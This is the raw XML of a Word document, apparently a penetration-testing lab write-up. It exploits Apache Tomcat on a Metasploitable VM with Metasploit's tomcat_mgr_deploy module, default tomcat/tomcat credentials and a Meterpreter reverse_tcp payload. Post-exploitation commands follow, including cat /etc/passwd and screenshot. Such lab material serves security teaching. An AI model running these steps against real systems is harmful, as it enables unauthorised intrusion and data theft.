    <w:p w14:paraId="139526C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search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tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF5172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Step 2: Use the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572EF678">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FCEE6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use exploit/multi/http/tomcat_mgr_deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD15F9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Step 3: Set Required Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4CE6A">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457AF3B7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set RHOSTS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192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9B61A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set RPORT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8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA054A6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set HttpUsername tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47ED89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set HttpPassword tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3DCA0B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set PAYLOAD java/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318FB918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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC5028">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0DA6FA">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Meterpreter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session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3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opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD23DCD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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0192A89F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2072C2DF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>PART 6 – Post-Exploitation Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7E084D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1. Capture System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F09B40">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F752FA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sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F61A65B">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CFA2A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OS: Linux Metasploitable 2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF43C3F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2. List User Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C195C26">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748FF7F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cat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/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595FB69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3. Read Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BCCFF4">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B0C9B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meterpreter &gt;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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D56A7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4. Screenshot (if GUI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E394E1">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B88A5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screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A2E44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5B335B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE7A1B5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5F0B46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CAA2CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E03D6F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197DC830">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607DF1F1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB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A44CC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03A44C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8970FB0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18970F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500602E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45006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B6C434A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B6C43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E443972"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E4439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4895C19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54895C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A1C"/>
    <w:rsid w:val="00011897"/>
    <w:rsid w:val="001D48EE"/>
    <w:rsid w:val="003A782F"/>
    <w:rsid w:val="00446552"/>
    <w:rsid w:val="004A4E8F"/>
    <w:rsid w:val="004C1EF6"/>
    <w:rsid w:val="00695164"/>
    <w:rsid w:val="007F5F2A"/>
    <w:rsid w:val="0080066E"/>
    <w:rsid w:val="008A43C5"/>
    <w:rsid w:val="008B5F96"/>
    <w:rsid w:val="008F46B9"/>
    <w:rsid w:val="009C2575"/>
    <w:rsid w:val="00B43B98"/>
    <w:rsid w:val="00B44667"/>
    <w:rsid w:val="00C07ECF"/>
    <w:rsid w:val="00C65AB0"/>
    <w:rsid w:val="00DC4A1C"/>
    <w:rsid w:val="00E56AA4"/>
    <w:rsid w:val="00E65B9C"/>
    <w:rsid w:val="00ED7636"/>
    <w:rsid w:val="00EF0433"/>
    <w:rsid w:val="00F41F60"/>
    <w:rsid w:val="00F673A7"/>
    <w:rsid w:val="0EC32D44"/>
    <w:rsid w:val="28F23760"/>
    <w:rsid w:val="31D82653"/>
    <w:rsid w:val="687A1374"/>
    <w:rsid w:val="6DEC0116"/>
    <w:rsid w:val="7C055284"/>
    <w:rsid w:val="7C5F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2E75B6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E75B6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1616</Words>
  <Characters>9217</Characters>
  <Lines>76</Lines>
  <Paragraphs>21</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10812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2025-11-25T14:38:00Z</dcterms:created>
  <dc:creator>Atharv Kinjawadekar</dc:creator>
  <cp:lastModifiedBy>WPS_1709743493</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-25T17:56:37Z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AD32B5226EE84825912E7EB364941711_13</vt:lpwstr>
  </property>
</Properties>
</file>